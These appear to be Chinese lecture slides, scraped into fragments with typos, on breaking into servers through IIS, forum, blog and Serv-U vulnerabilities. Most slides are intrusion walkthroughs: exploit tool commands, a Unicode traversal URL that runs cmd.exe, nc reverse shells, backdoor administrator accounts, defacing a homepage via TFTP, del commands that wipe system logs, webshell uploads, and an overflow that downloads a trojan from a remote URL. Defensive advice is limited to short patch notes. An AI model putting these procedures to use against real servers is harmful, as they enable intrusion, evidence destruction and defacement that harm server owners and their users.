1、基于服务器软件漏洞的入侵,随着计算机应用的进一步普及和计算机网络的高速发展,越来越多的公司或个人架设自己的网络服务。但是这些软件在给人们带来方便和好处的时候本身的缺陷却被忽略。 服务器软件漏洞轻则导致服务器的信息被窃取,重则导致服务器被远程控制。,本章内容,IIS漏洞带来的入侵 论坛系统带来的入侵 Blog系统带来的入侵 Serv-U带来的入侵,IIS漏洞带来的入侵,IIS为Internet Information Server的缩写,是Windows系统提供的Internet服务,作为“windows组建”附加在windows系统中。通过IIS,windows系统可以方便的提供Web服务、F
2、TP服务和SMTP服务等。 IIS在方便用户使用的同时,也带来了安全隐患。据说有关IIS的安全漏洞有上千种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。对于这种漏洞,入侵者能够通过发送特定格式的数据是远程服务器溢出,从而突破系统的保护。,关于溢出漏洞 .ida&.idq漏洞 Painter漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞 关于扩展引发的漏洞 Windows Media服务nsiislog.dll远程缓冲区溢出漏洞 Microsoft Frontpage Server Extensions远程缓冲区溢出漏洞,搜集IIS信息,1、通过telnet 目标IP
3、80搜集Web服务器版本信息 2、在telnet连上之后需要连敲两次回车才能得到信息 3、通过telnet 目标IP 21搜集FTP服务器版本信息,.ida&.idq漏洞,漏洞描述 IIS的index server .ida/.idq ISAPI扩展存在缓冲区溢出漏洞 影响系统IIS4.0和5.0 Index Server可以加快Web的搜索能力,提供对管理员脚本和Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq,不过都是使用idq.dll来进行解析。但是存在一个缓冲区溢出,其中问题存在于idq.dll扩展程序上,由于没有对用户提交的参数进行边界检查,可以导致远程攻击者利
4、用理出货的system全线来访问远程系统。,漏洞检测,手工方式:在IE中输入http:/targetIP/*.ida或http:/targetIP/*.idq 回车确认后如果提示“找不到*文件的信息”,就说明存在该漏洞 工具检测:X-Scan在“扫描模块”中选中“IIS漏洞”,如果得到“可能存在IIS Index Server ISAPI扩展远程溢出漏洞(/null.ida)或(/null.idq)”则说明存在该漏洞。,漏洞利用,IDA入侵实例 IDAHack:是基于命令行的溢出工具,能够溢出打了sp1、sp2补丁的Windows 200。当远程服务器溢出后,便会在指定的端口得到一个Telne
5、t权限 Idahack 类型: 中文win200 1 中文win200 sp1 2 中文win200 sp2 3,入侵思路,1、扫描远程服务器,先用X-scan扫描,然后手工炎症 2、使用idahack IP 80 1 520进行溢出 3、成功后,使用telnet IP 520远程登录服务器 4、使用上一章所讲方法建立后门帐号 5、exit退出,IDQ入侵实例,IISIDQ是snake编写的IDQ溢出工具,有命令行和图形界面两种方式,而且溢出成功后可以选择两种入侵方式 Iisidq 命令1 Iisidq 命令1 类型: 0-iis5中文win2000 1-iis5中文win2000 sp1 2
6、-iis5中文win2000 sp2,溢出后的连接工具-nc,Nc在网络攻击中素有“瑞士军刀”的美誉,是入侵者经常使用的工具之一。 主动连接到外部:nc -option host port ports 监听以等待外部连接:nc l p port -option host port 详细讲解参考帮助,入侵思路,1、扫描远程服务器,确认存在IDQ溢出漏洞 2、IDQ溢出iisidq 0 IP 80 1 521 1表示以iisidq的连接方式一对ip进行IDQ溢出漏洞,端口为80,成功后,远程服务器会打开521号端口等待外部连接。参数输入命令1设为1,表示不使用默认命令“cmd.exe /c+dir
7、”,而是要在以后输入新的命令 也可以使用iisidq的gui工具来实现 3、nc连接nc v IP 521,从而获得具有管理员权限的shell 4、建立后门账号 5、exit退出,安全解决方案,1、下载安装补丁 2、删除对.ida和.idq的脚本映射,.Printer漏洞,Windows 2000 IIS5.0 .print ISAPI扩展存在缓冲区溢出漏洞 影响系统windows 2000 3个 server Window 2000 iis 5.0存在打印扩展ISAPI使得.printer扩展与msw3prt.dll扩展名到msw3prt.dll的映射关系,并会处理用户请求,但在msw3po
8、rt.dll文件中存在缓冲区溢出漏洞。“Host:”栏中包含大约420字节的Http.printer请求给服务器,就可以导致缓冲区溢出并执行人以代码。该攻击可以使Web服务器停止响应。 该漏洞非常危险,仅需要代开80端口或者443端口。,漏洞检测,使用X-Scan扫描IIS漏洞,如果得到“可能存在IIS 5.0 .printer远程缓冲区溢出漏洞”则说明该服务器存在.printer漏洞。,漏洞利用,使用工具IIS5 .printer Exploit进行漏洞利用 格式:iis5exploit ,稍等片刻,如果溢出成功,便会在本级nc监听的窗口出现,此时入侵者就得到了远程服务器管理员的shell。
9、,入侵实例,1、使用nc l p 250在本地开一个监听端口 2、使用iis5exploit 对远程主机进行漏洞溢出。 建立后门账号 退出,也可以使用iisx进行漏洞溢出 格式:iisx Sp:0-没有补丁,1-有补丁 -p:如果溢出成功,就会在远端打开7788端口等待连接 -a:如果溢出成功,会在远端添加一个管理员账号hax:hax,入侵者可以使用net use连接远端服务器,或者使用DameWare实现远程控制。 -r:反向连接,能够穿透部分设置的防火墙。入侵者首先在本地nc打开监听端口。,安全解决方案,打补丁,微软已经发布了针对该漏洞的补丁,Unicode目录遍历漏洞,微软IIS4.0或
10、5.0扩展Unicode目录遍历漏洞 影响系统:win2000 及 NT4.0 IIS4.0或5.0 都存在利用扩展Unicode字符取代“/”和“”而能利用“/”目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename帐号的上下文空间访问任何已知的文件。该帐号在默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除修改或执行。,漏洞利用,从漏洞的描述可以看出,Unicode漏洞允许未经授权的用户使用客户端IE来构造非法字符。因此只要入侵者能够狗仔出适当的字符如“/” “”,就可以利用“/”来遍历与Web根
11、目录处在一个逻辑驱动器上的目录,从而导致“非法遍历”。这样一来入侵者就可以利用该方法操作该服务器上的磁盘文件,可以新建、下载、删除、执行磁盘文件。除此之外,入侵者通过构造Unicode编码利用来找到并打开该服务器上的cmd来执行命令 可以利用%c1%1c=/和%c0%2f=来构造,漏洞检测,手工:假设远程服务器为win200pro,在IE地址栏中输入http:/IP/scripts/%c1%1c/winnt/system32/cmd.exe?/c+dir+c:,与远程服务器连接之后,如果把C盘的内容列出来了则证明存在该漏洞。 工具检测:使用X-scan选中“IIS漏洞”,如果得到类似的“/sc
12、ripts/%252f/cmd.exe?/c+dir”就说明存在漏洞,漏洞利用,利用Unicode漏洞,入侵者能够把IE编程远程执行命令的控制台。不过Unicode漏洞并不是远程溢出漏洞,不能拿到管理员权限的shell,只能进行简单的文件类操作。,实例1:涂鸦主页,1、准备一个自己涂鸦的主页 2、探知远程服务器的Web根目录 如果存在.ida&.idq可以在地址栏中输入http:/ip/1.ida从而获得web根目录 通过查找文件的方法找到远程服务器的Web根目录。在地址栏中输入http:/ip/scripts/%c1%1c/winnt/system32/cmd.exe?/c+dir+c:mm
13、c.gif/s 3、涂鸦主页:可以利用dir+web根目录来查找主页 4、上传主页覆盖:在本地打开TFTP服务器,不进行任何设置,只要把准备好的web文件拷贝到tftf服务器路径下即可。 TFTP的命令:tftp I host GET|PUT source dest tftp+IP+get+1.htm+web根目录index.htm来覆盖该服务器的主页。,实例2:擦脚印,在客户端IE浏览器中利用Unicode编码漏洞,使用下列命令清除日志文件: Del+c:winntsystem32logfiles*.* Del+c:winntsystem32config*.evt Del+c:winntsy
14、stem32dtclog*.* Del+c:winntsystem32*.log Del+c:winntsystem32*.txt Del+c:winnt*.txt Del+c:winnt*.log,实例3:Unicode综合利用,ASP工具海阳顶端网木马,是一套asp在线的网页编辑软件,支持在线更改、编辑、删除任意文本文件,是无组件asp上传。 1、上传木马文件,利用tftp 2、隐藏木马文件,利用attrib +h +s 3、可以写成一个bat处理文件,入侵步骤,1、把load.bat传到远程服务器的C盘tftp 2、通过bat文件把木马传入该服务的web根目录下。 3、控制服务器,密码是
15、,安全解决方案,打补丁进行修复,.asp映射分块编码漏洞,Window 2000和NT4 IIS .asp映射存在远程缓冲溢出漏洞 影响系统window2000和NT ASP ISAPI过滤器默认在window2000和NT4种装在,存在的漏洞可以导致远程执行任意命令。恶意攻击者可以使用分块编码形式数据给IIS服务器,当解码和解析这些数据的时候可以迫使IIS把入侵者提供的数据写到内存任意位置。 该漏洞可以使win200产生缓冲区溢出并以IWAM_computername用户的权限执行任意代码。,漏洞检测,使用X-scan,如果得到“可能存在IIS.asp映射分块编码远程缓冲区溢出漏洞”就说明远
16、程服务器存在该漏洞。,漏洞利用,IIS aps.dll overflow program 2.0 格式:aspcode aspfile webport winxp 如果键入aspcode IP,接着按几下回车键等待一会儿,如果得到c:winntsystem32的提示符,就意味着溢出成功。 可以通过打补丁的方式来解决该漏洞,WebDAV漏洞,Windows 2000 ntdll.dll webDAV接口远程缓冲区溢出漏洞 影响系统window 2000系统 IIS5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查,远程入侵者可以通过向WebDAV提交一
17、个精心构造的超常数据请求而导致发生缓冲区溢出,可能使入侵者以LocalSystem的权限在主机上执行任意命令。,漏洞检测,WebDAVScan是红盟编写的专门用于检测IIS5.0中WebDAV漏洞的专用扫描器,可以扫描一个IP段,并可以返回远程服务的Web服务器版本。,漏洞利用,Wd0.3-en.exe:英文版IIS溢出工具,需要与nc配合使用,能够突破一定限制的防火墙。 首先使用nc在本地打开一个监听端口nc vv l p 250 然后打开wd0.3-en.exe,在其中输入远程服务器IP,本机IP和端口。 然后进行漏洞溢出,等一段时间后,如果WebDAV漏洞溢出成功,远程服务器便会与本地的
18、监听端口主动连接,建立连接后,就可以执行任何命令。,Webdavx3,中文版的IIS溢出工具,溢出成功后直接打开7788端口等待连接。 使用方法:webdavx3 WebDAV:突破防火墙的WebDAV溢出 使用方法:webdav Port:为目标web服务器的端口 Offset:一般设为0,8,9的成功几率高 一旦出现“c:inetputwwwrootnnnnn OK!”表示成功。注意该工具只支持中文版的win2000,实例,使用Webdavx3对中文版的IIS5进行WebDAV漏洞溢出 1、使用WebDAVScan扫描WebDAV漏洞 2、使用Webdavx3对远程IIS5进行溢出 3、使
19、用telnet或者nc远程登录服务器 4、建立后门账号 5、退出,安全解决方案,安装微软提供的相关补丁,WebDAV超常请求远程拒绝服务攻击漏洞,Microsoft IIS WebDAV超常请求远程拒绝服务攻击漏洞 影响系统:IIS5.0 IIS5.1 描述:IIS5.0默认提供了对WebDAV的支持,WebDAV可以通过HTTP向用户提供远程文件存储的服务。 WebDAV实现对部分模式的超常请求处理不正确,远程攻击者可以利用这个漏洞对IIS服务器进行拒绝服务攻击。 攻击者可以使用prfofind或search请求方法,提交包含49153字节的WebDAV请求,IIS会由于拒绝服务而重新启动。
20、,漏洞利用,拒绝服务攻击也称DoS,在这种攻击下,通过阻塞目标网络或发送畸形数据使远程服务器过载而瘫痪,从而不能向任何客户提供服务。通常来说,dos不需要远程服务器存在任何漏洞,完全是恶意攻击,入侵者得不到任何权限。,实例,通过WebDAV拒绝服务攻击漏洞使远程IIS服务器拒绝服务 使用Webdavdos 格式webdavdos ip 但是该工具的成功几率比较低,其实可以利用webdavx3进行溢出,成功后会打开7788端口,而80端口就死掉了,安全解决方案,安装相应补丁程序,WebDAV XML消息处理远程拒绝服务漏洞,影响系统:IIS6.0 5.1 5.0 描述:IIS包含的WebDAV组
21、件对特殊构造的WebDAV请求处理不正确,远程攻击者可以利用这个漏洞利用WebDAV消耗大量内存和CPU时间,导致拒绝服务攻击。 攻击者可以构建恶意的使用XML属性的WebDAV Proffind请求,可导致XML解析器消耗大量的内存和CPU时间,造成拒绝服务。,漏洞检测,使用X-scan,设定“攻击测试脚本”扫描项目进行扫描,漏洞利用,由于需要使用到Perl,所以大家下去后自己找资料进行学习。,WindowsMedia服务nsiislog.dll远程缓冲区溢出漏洞,影响系统:windows 2003/2000 描述:Microsoft Windows媒体服务,支持通过多播流从网络上传送媒体内
22、容给客户端。 Windows的媒体服务的ISAPI扩展实现对用户请求处理存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击或执行任意命令。 在多播流中,为了能记录客户端信息,Windows 2000提供了多播和单播传输进行记录的功能。此功能以ISAPI扩展实现nsiislog.dll。Windows 2000下安装的nsiislog.dll处理超常POST请求数据时存在缓冲区溢出漏洞,这可导致供给者发送畸形请求给服务器,使IIS停止对Internet请求的相应或执行任意命令。,漏洞检测,如果远程计算机打开了Windows Media服务,其主机上会打开1755端口,而开放Me
23、dia服务的远程主机有存在漏洞的可能性。 使用SuperScan来检测主机是否开放了1755端口。 或者使用X-scan进行扫描,漏洞利用,Iis.exe 使用格式:iis IP port 这个工具是nsiislog.dll远程缓冲区溢出漏洞的专用溢出工具,溢出成功后,远程主机会打开59端口等待入侵者连接。,Microsoft FrontPage Server Extensions远程缓冲区溢出漏洞,影响系统:windows xp,2000 描述:Microsoft Frontpage服务器扩展是Microsoft公司开发的用于加强IIS web服务器的功能的软件包 Frontpage Ser
24、ver Extensions存在两个新的安全漏洞,远程攻击者可以利用这个漏洞进行缓冲区攻击,可能以Frontpage进程权限在系统上执行任意指令。,使用X-scan进行扫描 使用fp30reg 进行溢出攻击,溢出成功后绑定9999端口,同时会获得shell权限。 该方法成功的几率比较高,论坛系统带来的入侵,论坛是Internet上的一种电子信息服务系统,它提供一块公共电子白板,每个注册用户都可以在上面发布信息或者提出看法。 常见的论坛程序有动网论坛、雷遨论坛和比较流行的BBSXP论坛 主要讲解一下上传漏洞和暴库漏洞,上传漏洞,动网论坛上传漏洞的存在于DV BBS7.0 sp2及其更低的所有版本
25、中,其中DVBBSsp2以前的版本可以利用工具直接上传asp文件 漏洞存在于基本资料修改中头像上传位置,单击上传按钮将调用upfile.asp文件,而该文件存在文件类型过滤不严的问题。,漏洞利用思路,检测到漏洞后,在存在漏洞论坛中注册一个用户帐号,利用这个账号获取Cookie,在本地制作网页木马文件,使用专用工具结合已获取的Cookie值将网页木马上传到远程主机中。,搜索漏洞,在搜索引擎当中搜索Powered By:DVbbs Version 7.0.0 SP1,注册用户,因为想要使用上传漏洞需要进入用户基本资料设置页面,因此需要先注册一个页面,假设用户名为ccniit,密码为123456,获
26、取COOKIE,Cookie是由Internet站点创建的、将信息存储在计算机上的文件,可以保存用户个人的存储信息,一旦将cookie保存在计算机上,只有创建Cookie的网站才能读取。 COOKIE分为永久cookie和临时cookie,临时的浏览器一关闭就消失,永久的保存在硬盘中,下次可以访问。,使用Winsock Expert获得cookie,使用海阳顶端网生成木马程序,利用DV BBS上传利用程序上传网页木马,连接检测,成功后就可以做进一步的入侵了观看视频上传漏洞的利用,安全解决方案,论坛系统的上传漏洞是一个普遍存在的漏洞,由于不同论坛系统在实现方式上存在差异,因此对于上传漏洞的修补,
27、需要到具体的论坛系统的官方网站下载相应的补丁包或升级程序。,暴库漏洞,暴库是指通过显示错误信息的方式把数据库的物理路径给暴露出来。观看视频教程,暴库漏洞利用思路,首先检测远程主机是否存在漏洞。检测到漏洞后注册一个账号,获取Cookie信息。暴库拿到管理员账号、前台密码和后台密码后结合已经获得的Cookie进行Cookie欺骗,从而获得管理员权限。具体的操作看视频教程,Blog系统带来的入侵,Blog是继Email,BBS后出现的又一种网络交流方式。 Blog大致可以分成两种形态,一种是个人创作,另一种是将个人认为有趣的有价值的内容推荐给读者。 常用的Blog系统有L-Blog,Dlog,Mis
28、sLog,oBlog等。 Blog在给人们带来便利的同时,自身也存在需要完善的地方。 关于blog的入侵,介绍下在数据库漏洞和Cookie欺骗漏洞,直接下载数据库漏洞,直接下载数据库漏洞属于设计漏洞,允许未经授权的用户通过直接输入地址下载Blog系统的数据库。下面以猪飞飞的Dlog系统为例讲解如何入侵的,入侵思路,下载一个Dlog系统,查看其结构得到数据库所在的默认位置。通过搜索引擎寻找存在漏洞的Blog主机,使用直接输入默认数据库路径的方式下载其数据库。查看已下载的数据库中的信息,获得管理员的相关信息。使用已经得到的管理员前后台账号登录到远程Dlog系统中,改变文件上传格式限制,上传网页木马
29、进而控制远程主机。,详细步骤,通过分析发现dlog的数据库保存在%WebRoot%log_mdbdlog_mdb.mdb 在IE地址栏中构造出路径,下载该数据库 打开数据库,查找管理员账号和密码 破解经过MD5加密的密码 获得用户名和密码,使用管理员的帐号和密码登录系统 修改上传文件的类型限制,使用asa进行替换其他类型 上传网页木马 获得网马的路径,从而获得WebShell的权限,安全解决方案,修改数据库的存放位置, 对数据库名称进行修改,同时更新数据库连接文件的内容。,Cookie欺骗漏洞,Cookie欺骗漏洞是由于系统对Cookie信息验证不严造成的。Cookie欺骗漏洞很容易被设计者忽
30、略,因此网上有很多的信息发布系统都存在这个漏洞。,Serv-U带来的入侵,Serv-U由两部分组成,引擎和用户界面,Serv-U引擎(ServUDaemon)是一个常驻后台的程序,负责处理各种Ftp客户端软件的ftp命令,同时负责执行各种文件传送的软件。 Serv-U用户界面负责与Serv-U引擎之间的交互,Serv-U Ftp服务器MDTM命令远程缓冲区溢出漏洞,影响系统: Serv-U 5.0 4.x 3.x 2.x 详细描述 Serv-U在处理MDTM命令的参数时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞对Ftp服务器程序进行缓冲区溢出攻击,可能以Ftp进程权限在系统上执行任意
31、命令 Serv-U提供ftp命令MDTM用于用户更改文件时间,当用户成功登陆系统,并发送畸形超长的时区数据作为命令参数,可触发缓冲区溢出,精心构造参数数据可能以Ftp进程权限在系统上执行任意指令。,漏洞说明,利用ServU服务器MDTM命令远程缓冲区溢出漏洞要求Serv-U的版本号不能高于5.0,同时利用此漏洞需要入侵者能够登录到系统,但不需要写权限或其他权限。这个漏洞实际上是通过对Serv-U服务器的溢出攻击入侵远程系统的。,漏洞检测,因为漏洞是和Serv-U的版本号相关的,所以利用FlashFXP检查出远程ftp服务器的类型及版本号即可。,漏洞利用,工具:sv.exe 命令格式: sv.e
32、xe sv.exe sv.exe 其中: host:开启服务的主机地址 Port:开启服务的端口号 User:用于登录的用户名 Pass:用于登录的密码 Url:远程下载地址 该工具溢出成功后打开远程主机上8111端口共入侵者连接。,入侵实例1-开启远程主机端口,首先使用FlashFXP检测远程主机的Serv-U版本 使用sv IP user pass进行溢出,溢出成功后打开8111端口等待连接 使用nc vv IP 8111连接远程主机 然后添加账号 ,入侵实例2-远程下载木马服务器端,生成木马的服务器端 漏洞检测 使用sv IP 21 user pass 木马所在url进行溢出攻击,成功后
33、就可以将木马程序下载到ftp所在的计算机。,Serv-U本地权限提升漏洞,影响的系统:Serv-U6.x 5.x 4.x 3.x Serv-U存在设计问题,本地攻击者可以利用这个漏洞以System权限在系统上执行任意命令。 所有Serv-U存在默认本地管理员登录密码,该账号只能在本地接口中连接,因此本地攻击者可以连接Serv-U并建立拥有执行权限的FTP用户,在这个用户建立后,连接FTP服务器并执行“Site EXEC”命令,系统就会以System权限执行。,漏洞说明,从上面漏洞的描述中可以发现这个漏洞的利用原理:在本地连接到Serv-U的特定端口,以默认本地管理员密码登录后可以以系统权限执行任意命令。 系统供Serv-U默认本地管理管理员登录的默认端口号为43958,漏洞检测,使用FlashFXP进行版本检测即可 漏洞利用工具:myservu.exe 格式:myservu port “command” 这是利用Serv_U软件漏洞进行提升权限的专用工具。Port为Serv-U软件默认管理员的登录端口,cmd为指定执行的命令。,实例-利用serv-u进行权限的提升,观看视频,谢谢!,
